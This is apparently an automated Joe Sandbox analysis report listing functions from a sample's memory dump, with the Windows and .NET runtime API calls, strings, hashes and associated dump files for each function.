Opcode ID: df729872f656d9d202974d113ebd94060dc68076942cea10bc0c186e7e9af3f3
Instruction ID: 100691a5b2063f7688cafa02b59620bce8bdd5821d72b077066c94d017e53aed
Opcode Fuzzy Hash: df729872f656d9d202974d113ebd94060dc68076942cea10bc0c186e7e9af3f3
Instruction Fuzzy Hash: 25516E71A29B4686EA80AF16FC80979E3A2FF49780FD44135D95DA7354EF3CE408C725

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301C8D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF703015779), ref: 00007FF70301C8DB

Part of subcall function 00007FF703024720: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF70302472F
Part of subcall function 00007FF703024720: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF70302476D
Part of subcall function 00007FF703024720: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF703024799
Part of subcall function 00007FF703024720: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF7030247AA
Part of subcall function 00007FF703024720: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF70301C8FA), ref: 00007FF7030247B9

Part of subcall function 00007FF70301D980: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF70301DA7D

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF703015779), ref: 00007FF70301C94A
GetProcessAffinityMask.KERNEL32 ref: 00007FF70301C95D
QueryInformationJobObject.KERNEL32 ref: 00007FF70301C9AE

Strings

PROCESSOR_COUNT, xrefs: 00007FF70301C916

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
String ID: PROCESSOR_COUNT
API String ID: 296690692-4048346908
Opcode ID: 6faeaf520d1afd1e5c9263b64dab5b753341e62a2aa71de75da050c32727acfa
Instruction ID: 430d66a16abc04936bf7e61bf3d2f77dc3ceb9e228c92ce6a479732cdb987af6
Opcode Fuzzy Hash: 6faeaf520d1afd1e5c9263b64dab5b753341e62a2aa71de75da050c32727acfa
Instruction Fuzzy Hash: 21317E31A4EA4286FB94FB54EC842B9E3A2EF45398FC40435D64E67795EF2CE4098724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703042080 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 244
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF703024970: VirtualAlloc.KERNELBASE ref: 00007FF703024986
Part of subcall function 00007FF703024970: VirtualFree.KERNELBASE ref: 00007FF70302499C

EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF70302B50F), ref: 00007FF7030422EC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF70302B50F), ref: 00007FF70304232D
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF70302B50F), ref: 00007FF703042357
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF70302B50F), ref: 00007FF703042378

Strings

PER_HEAP_ISOLATED data members initialization failed, xrefs: 00007FF7030424C5

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeaveVirtual$AllocFree
String ID: PER_HEAP_ISOLATED data members initialization failed
API String ID: 1836396605-1705445303
Opcode ID: cdf440fb9e53cca7cc67544d1ea2bc89a610982a624589cfda9886a174576be0
Instruction ID: 1e5006664ad4bd0d0d8b2ec010912df955c57bf89776eb89a47dd794a3dbc115
Opcode Fuzzy Hash: cdf440fb9e53cca7cc67544d1ea2bc89a610982a624589cfda9886a174576be0
Instruction Fuzzy Hash: 73C15971E0E68296F6D0BB12ED805B8F7A9AF51780FC4453DE94C666A2DF7CA140C738

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703016EF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF703016ED8,?,?,?,00007FF70313D272,?,?,?,?,?,00007FF703014B39), ref: 00007FF703016F35
RaiseFailFastException.KERNEL32(?,?,?,00007FF703016ED8,?,?,?,00007FF70313D272,?,?,?,?,?,00007FF703014B39), ref: 00007FF703016F61
RaiseFailFastException.KERNEL32(?,?,?,00007FF703016ED8,?,?,?,00007FF70313D272), ref: 00007FF703016F9A

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF703016F86

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 9b399c8e1136877a25d74455b65c9d366a1687b6bd651fb2c43d6d5db8af5545
Instruction ID: 6c4d051e09d8390a3b42f6687ca21a188fe0032a1acac349f654e2577abfede1
Opcode Fuzzy Hash: 9b399c8e1136877a25d74455b65c9d366a1687b6bd651fb2c43d6d5db8af5545
Instruction Fuzzy Hash: C5218331A1AA4681E7D0FF15EC80775F3A2EF04744F844039EE5D52791EF3DE4518264

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301CB60 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF70301CB81
SetThreadPriority.KERNELBASE ref: 00007FF70301CB9D
ResumeThread.KERNELBASE ref: 00007FF70301CBA6
FindCloseChangeNotification.KERNELBASE ref: 00007FF70301CBAF

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
String ID:
API String ID: 2150560229-0
Opcode ID: c1ae51820efb916145f94c4b900e95fb739a024f2e71c84a6de6a6ddca0c6da9
Instruction ID: c7d4953e7aa908721fecb827cdab19fff63514b045ccb313bd44ba75d3945c34
Opcode Fuzzy Hash: c1ae51820efb916145f94c4b900e95fb739a024f2e71c84a6de6a6ddca0c6da9
Instruction Fuzzy Hash: 1DE09BF9E45B0253FB58AB21BC1533593506F9DB95F8C4434CD5E1A750EF3CD1858514

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703024080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF7030240B7
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF70302417C

Strings

@, xrefs: 00007FF703024174

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CurrentGlobalMemoryProcessStatus
String ID: @
API String ID: 3261791682-2766056989
Opcode ID: 9a81aefacf0331d3f1c8160c7a70ac81e939ce1a53b098b791292b37b437df5a
Instruction ID: 6ba399a534efff0fff275473563fc0c877e079913a484aec562b16f990c28119
Opcode Fuzzy Hash: 9a81aefacf0331d3f1c8160c7a70ac81e939ce1a53b098b791292b37b437df5a
Instruction Fuzzy Hash: 9A41C261B0AB4642E996DB3BD910B39E6936F59BC0F988731D90E36B44FF3CE4818714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703052190 Relevance: 5.1, APIs: 4, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF703040749,?,?,?,?,00000000,00007FF70303950F), ref: 00007FF7030521D0
LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF703040749,?,?,?,?,00000000,00007FF70303950F), ref: 00007FF703052246
EnterCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF703040749,?,?,?,?,00000000,00007FF70303950F), ref: 00007FF70305229B
LeaveCriticalSection.KERNEL32(00000000,00000000,00000001,00007FF703040749,?,?,?,?,00000000,00007FF70303950F), ref: 00007FF7030522C1

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: ca1d284c392b875d9020e40ed600bf340b6f3a3ca342556000de4b753edbc3ee
Instruction ID: 028c68f5567404cd0edff9302a71ede628fee26117166fe28d259d00e2775d6a
Opcode Fuzzy Hash: ca1d284c392b875d9020e40ed600bf340b6f3a3ca342556000de4b753edbc3ee
Instruction Fuzzy Hash: 9E319E35E0D64AA1EAA1FB11EC80BBAE369BF16740FC4093AD94C26695CF7CE441C734

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703036E70 Relevance: 5.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036EBA
LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036EFC
EnterCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036F27
LeaveCriticalSection.KERNEL32(?,?,00000080,00007FF703036FF9,?,?,00000000,00007FF7030426BA), ref: 00007FF703036F48

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 75d63f245788b162980f9012f4fa1529ccaf0e472e3db3d994f2288b863829b1
Instruction ID: a329440af9e0ee484ce4b38124f7391b7c17c65a1c57dac2e5a058febca49ec9
Opcode Fuzzy Hash: 75d63f245788b162980f9012f4fa1529ccaf0e472e3db3d994f2288b863829b1
Instruction Fuzzy Hash: A0213B31A19947A1EAD0BB25ED80BB8E375EF067A0FC80339D52C625E5DF2CE095C324

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70302EA70 Relevance: 4.7, APIs: 3, Instructions: 195
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SwitchToThread.KERNEL32 ref: 00007FF70302EB52
SwitchToThread.KERNEL32 ref: 00007FF70302EB5B

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: SwitchThread
String ID:
API String ID: 115865932-0
Opcode ID: fd19f6a6f24e2cb20bee9a2bdfd1b0c123ec33f299c4624ee8511935dfa179c0
Instruction ID: 43427cc9846642f8a5e5ed9e89c86cac884a0a6629449fcc61e4f20c5abceeda
Opcode Fuzzy Hash: fd19f6a6f24e2cb20bee9a2bdfd1b0c123ec33f299c4624ee8511935dfa179c0
Instruction Fuzzy Hash: BB718B31E4A20786FAE4BB51EC80A76E292AF40755F844139EE5EB62D5DF3CF441C728

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7030249B0 Relevance: 4.5, APIs: 3, Instructions: 34
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF703027288,?,?,0000000A,00007FF7030262C0,?,?,00000000,00007FF70301F281), ref: 00007FF7030249D7
GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF703027288,?,?,0000000A,00007FF7030262C0,?,?,00000000,00007FF70301F281), ref: 00007FF7030249F7
VirtualAllocExNuma.KERNEL32 ref: 00007FF703024A18

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: AllocVirtual$CurrentNumaProcess
String ID:
API String ID: 647533253-0
Opcode ID: ac1d7b537091b059dfc2b43afeaf83d519ce294a74938f3c6a7eb7fdd97e6444
Instruction ID: 0802738b422565eaa772fe0a83d45b7e9e062a847f45a7cdb2534bb0c4fd3822
Opcode Fuzzy Hash: ac1d7b537091b059dfc2b43afeaf83d519ce294a74938f3c6a7eb7fdd97e6444
Instruction Fuzzy Hash: D0F0AF75B0869182EB609B06F80021AE760BF4ABD4F884539EF9C27B58DB3DC5828B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70307AC40 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF70307AC5A
Concurrency::cancel_current_task.LIBCPMT ref: 00007FF70307AC70

Part of subcall function 00007FF70307B804: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF70307B80D

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
String ID:
API String ID: 205171174-0
Opcode ID: b9993a65d322f5a22c3740859bfbd2a6abde766db8489619dc16308307fcd974
Instruction ID: 8165df8b12a617f488986afc8fe51278731734c99acfe50b0cfb4ec42e7f721d
Opcode Fuzzy Hash: b9993a65d322f5a22c3740859bfbd2a6abde766db8489619dc16308307fcd974
Instruction Fuzzy Hash: D4E04640F0B10712F9E8B6664C562B890925F48772F9C5730DA3E253C2AF1CA066813C

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF70301CB20 Relevance: 3.0, APIs: 2, Instructions: 18threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00007FF70301CB39
FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00007FF70301AB14), ref: 00007FF70301CB4C

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: ChangeCloseCreateFindNotificationThread
String ID:
API String ID: 4060959955-0
Opcode ID: a08dc96ef98d388028e25f38437564d77a0777dd0af1ad674e5a25c6522611b5
Instruction ID: 5ee74b8d7b1d88c7166d0a6a3f06a2ce903802e8d5638ff3cdf07a995f35ca0e
Opcode Fuzzy Hash: a08dc96ef98d388028e25f38437564d77a0777dd0af1ad674e5a25c6522611b5
Instruction Fuzzy Hash: B7D01275E09B8193DB98EB616C0112597D16F9DB44FD84438D94D93724FF3C92158910

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF703021E30 Relevance: 2.6, APIs: 2, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00007FF703021EAE

Memory Dump Source

Source File: 0000000D.00000002.2412646226.00007FF703011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF703010000, based on PE: true

Associated: 0000000D.00000002.2412598393.00007FF703010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413018753.00007FF7031D3000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413298334.00007FF703303000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413358052.00007FF70331B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413432721.00007FF70331C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413468517.00007FF70331D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413500207.00007FF703321000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF703322000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413552726.00007FF70332D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000D.00000002.2413709455.00007FF703335000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff703010000_KxgGGaiW3E.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 26bb6d4feb826c89409c737ffddf6c17083ef5c9aa542e6c36a30effe3fcae81
